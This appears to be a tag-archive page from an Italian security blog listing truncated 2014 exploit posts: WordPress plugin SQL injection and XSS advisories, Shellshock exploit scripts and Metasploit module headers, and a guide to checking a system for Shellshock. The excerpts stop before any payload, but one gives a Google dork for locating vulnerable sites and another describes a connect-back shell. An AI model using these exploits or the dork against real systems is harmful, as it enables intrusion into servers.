Tags archives: sicurezza

 


WordPress All In One WP Security 3.8.2 SQL Injection

Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication: September 3, 2014 [without technical details]
Vendor Notification: September 3, 2014
Vendor Patch: September 12, 2014
Public Disclosure: September 24, 2014
Vulnerability Type: SQL Injection [...]

 


WordPress Users Ultra 1.3.37 SQL Injection

#################################################################################################
# Title : Wordpress Users Ultra Plugin – SQL injection Vulnerability
# Risk : High+/Critical
# Author : XroGuE
# Google Dork : inurl: wp-content/plugins/users-ultra/
# Plugin Version : 1.3.37
# Plugin Name : users ultra
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip
# Vendor Home : http://www.usersultra.com/
# Date : 2014/09/27
# Tested in [...]

 


WordPress All In One Security And Firewall 3.8.3 XSS

Document Title:
===============
All In One Wordpress Firewall 3.8.3 – Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325

Release Date:
=============
2014-09-29

Vulnerability Laboratory ID (VL-ID):
====================================
1327

Common Vulnerability Scoring System:
====================================
3.3

Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, [...]

 


IPFire 2.15 Bash Command Injection

#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is [...]

 


DHCP Client Bash Environment Variable Code Injection

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/proto/dhcp'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::DHCPServer

  def initialize
    super(
      'Name' => 'DHCP Client Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment variables in Bash, specifically [...]

 


Apache mod_cgi Bash Environment Variable Code Injection

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted [...]

 


Gnu Bash 4.3 CGI Scan Remote Command Injection

#!/usr/bin/env python

# http connection
import urllib2
# Args management
import optparse
# Error management
import sys

banner = """ _______ _______ __ | _ .—–.–.–. | _ .—.-.—–| |–. |. |___| | | | |. 1 | _ |__ –| | |. | |__|__|_____| |. _ |___._|_____|__|__| |: 1 | |: 1 [...]

 


bashedCgi Remote Command Execution

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'bashedCgi',
      'Description' => %q{
        Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
      },
      'Author' =>
        [
          'Stephane Chazelas' [...]

 


Check whether our system is infected by Shellshock

In this guide we will see how to check for and fix the Shellshock problem on our Linux distribution.

Shellshock Test
In recent days we published an article about Shellshock, a bug reported by Red Hat researchers that is getting a lot of attention because it "could" put millions of personal computers and servers at risk. As usual, within a few hours of the report the developers of the main Linux distributions had already released an update that fixes the bug, preventing malicious users from using the bug to operate on our system (not a very simple operation).
We can also check very easily whether or not our operating system is "infected" by Shellshock.


 


Gnu Bash 4.3 CGI REFERER Command Injection

#!/usr/bin/perl
#
# Title: Bash/cgi command execution exploit
# CVE: CVE-2014-6271
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 25 September 2014
# Published: 26 September 2014
# MorXploit Research
# http://www.MorXploit.com
#
# Description:
# Perl code to exploit CVE-2014-6271.
# Injects a Perl connect back shell.
#
# Download:
# http://www.morxploit.com/morxploits/morxbash.pl [...]